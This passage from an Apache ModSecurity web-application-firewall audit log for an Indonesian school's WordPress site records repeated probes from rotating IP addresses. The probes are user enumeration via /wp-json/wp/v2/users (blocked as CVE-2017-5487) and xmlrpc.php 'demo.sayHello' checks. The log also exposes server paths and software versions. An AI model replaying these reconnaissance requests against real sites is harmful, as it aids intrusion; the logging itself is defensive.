userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747502501195876 5305 (- - -) Stopwatch2: 1747502501195876 5305; combined=4012, p1=587, p2=3182, p3=39, p4=53, p5=91, sr=55, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8766a50-Z-- --ab77e010-A-- [18/May/2025:00:24:15 +0700] aCjGPxKi5m5upc8uMd6p3gAAAMs 103.236.140.4 36222 103.236.140.4 8181 --ab77e010-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ab77e010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab77e010-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747502655169907 3480 (- - -) Stopwatch2: 1747502655169907 3480; combined=1824, p1=555, p2=1238, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab77e010-Z-- --bbcf1f01-A-- [18/May/2025:00:24:23 +0700] aCjGR3yxdQCiyU1ENFcfzwAAAAA 103.236.140.4 36836 103.236.140.4 8181 --bbcf1f01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.91 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bbcf1f01-C-- demo.sayHello --bbcf1f01-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbcf1f01-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747502663502921 14067 (- - -) Stopwatch2: 1747502663502921 14067; combined=12265, p1=1739, p2=9989, p3=125, p4=213, p5=123, sr=69, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbcf1f01-Z-- --a7054f33-A-- [18/May/2025:00:28:07 +0700] aCjHJ-m4kjNN-hEbWjIoJwAAAFM 103.236.140.4 52304 103.236.140.4 8181 --a7054f33-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a7054f33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7054f33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747502887319810 2487 (- - -) Stopwatch2: 1747502887319810 2487; combined=1150, p1=381, p2=743, p3=0, p4=0, p5=26, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7054f33-Z-- --cc97c70b-A-- [18/May/2025:00:28:13 +0700] aCjHLXyxdQCiyU1ENFclgAAAAAU 103.236.140.4 52758 103.236.140.4 8181 --cc97c70b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cc97c70b-C-- demo.sayHello --cc97c70b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc97c70b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747502893850466 7093 (- - -) Stopwatch2: 1747502893850466 7093; combined=5348, p1=790, p2=4233, p3=44, p4=57, p5=126, sr=69, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc97c70b-Z-- --15e73b32-A-- [18/May/2025:00:34:21 +0700] aCjInQTOsBn9MSWb6WJoJwAAAIA 103.236.140.4 48700 103.236.140.4 8181 --15e73b32-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15e73b32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15e73b32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503261333308 3682 (- - -) Stopwatch2: 1747503261333308 3682; combined=1949, p1=564, p2=1352, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15e73b32-Z-- --39e10864-A-- [18/May/2025:00:34:29 +0700] aCjIpem4kjNN-hEbWjIysAAAAEU 103.236.140.4 49120 103.236.140.4 8181 --39e10864-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --39e10864-C-- demo.sayHello --39e10864-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --39e10864-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503269431733 9140 (- - -) Stopwatch2: 1747503269431733 9140; combined=7427, p1=1225, p2=5899, p3=47, p4=63, p5=121, sr=61, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39e10864-Z-- --71974173-A-- [18/May/2025:00:36:19 +0700] aCjJExKi5m5upc8uMd68dQAAANE 103.236.140.4 56984 103.236.140.4 8181 --71974173-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71974173-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71974173-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503379118074 3030 (- - -) Stopwatch2: 1747503379118074 3030; combined=1403, p1=443, p2=928, p3=0, p4=0, p5=32, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71974173-Z-- --286d3958-A-- [18/May/2025:00:36:28 +0700] aCjJHBKi5m5upc8uMd68qgAAAM0 103.236.140.4 57668 103.236.140.4 8181 --286d3958-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --286d3958-C-- demo.sayHello --286d3958-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --286d3958-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503388080931 6602 (- - -) Stopwatch2: 1747503388080931 6602; combined=4939, p1=634, p2=4045, p3=50, p4=65, p5=87, sr=59, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --286d3958-Z-- --ce7d880a-A-- [18/May/2025:00:37:54 +0700] aCjJcum4kjNN-hEbWjI3oQAAAE8 103.236.140.4 35190 103.236.140.4 8181 --ce7d880a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ce7d880a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce7d880a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503474780204 2491 (- - -) Stopwatch2: 1747503474780204 2491; combined=1010, p1=355, p2=630, p3=0, p4=0, p5=24, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce7d880a-Z-- --37d1c739-A-- [18/May/2025:00:38:01 +0700] aCjJeQTOsBn9MSWb6WJuKAAAAIM 103.236.140.4 35624 103.236.140.4 8181 --37d1c739-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --37d1c739-C-- demo.sayHello --37d1c739-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --37d1c739-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503481954661 6052 (- - -) Stopwatch2: 1747503481954661 6052; combined=4878, p1=532, p2=4108, p3=38, p4=49, p5=93, sr=56, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37d1c739-Z-- --c721ca1c-A-- [18/May/2025:00:39:10 +0700] aCjJvgTOsBn9MSWb6WJv-QAAAI4 103.236.140.4 40714 103.236.140.4 8181 --c721ca1c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c721ca1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c721ca1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503550568535 2531 (- - -) Stopwatch2: 1747503550568535 2531; combined=1195, p1=398, p2=756, p3=0, p4=0, p5=41, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c721ca1c-Z-- --dbc0e101-A-- [18/May/2025:00:39:15 +0700] aCjJwwTOsBn9MSWb6WJwLQAAAII 103.236.140.4 41136 103.236.140.4 8181 --dbc0e101-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dbc0e101-C-- demo.sayHello --dbc0e101-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbc0e101-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503555981852 5478 (- - -) Stopwatch2: 1747503555981852 5478; combined=4182, p1=573, p2=3372, p3=40, p4=42, p5=93, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbc0e101-Z-- --9c00812a-A-- [18/May/2025:00:39:56 +0700] aCjJ7BKi5m5upc8uMd7CwQAAAMM 103.236.140.4 43712 103.236.140.4 8181 --9c00812a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c00812a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c00812a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503596150969 1905 (- - -) Stopwatch2: 1747503596150969 1905; combined=1077, p1=344, p2=708, p3=0, p4=0, p5=25, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c00812a-Z-- --bcf6907f-A-- [18/May/2025:00:40:02 +0700] aCjJ8nyxdQCiyU1ENFc2rQAAAAk 103.236.140.4 44192 103.236.140.4 8181 --bcf6907f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bcf6907f-C-- demo.sayHello --bcf6907f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcf6907f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503602881067 7612 (- - -) Stopwatch2: 1747503602881067 7612; combined=5755, p1=774, p2=4694, p3=48, p4=62, p5=105, sr=73, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcf6907f-Z-- --5426fa2a-A-- [18/May/2025:00:40:05 +0700] aCjJ9QTOsBn9MSWb6WJxXAAAAI8 103.236.140.4 44358 103.236.140.4 8181 --5426fa2a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5426fa2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5426fa2a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503605454013 2469 (- - -) Stopwatch2: 1747503605454013 2469; combined=1226, p1=401, p2=790, p3=0, p4=0, p5=35, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5426fa2a-Z-- --f93cc817-A-- [18/May/2025:00:40:12 +0700] aCjJ_BKi5m5upc8uMd7DPwAAAMQ 103.236.140.4 44888 103.236.140.4 8181 --f93cc817-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.172 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f93cc817-C-- demo.sayHello --f93cc817-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f93cc817-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503612253957 8272 (- - -) Stopwatch2: 1747503612253957 8272; combined=6786, p1=570, p2=5867, p3=53, p4=64, p5=139, sr=98, sw=93, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
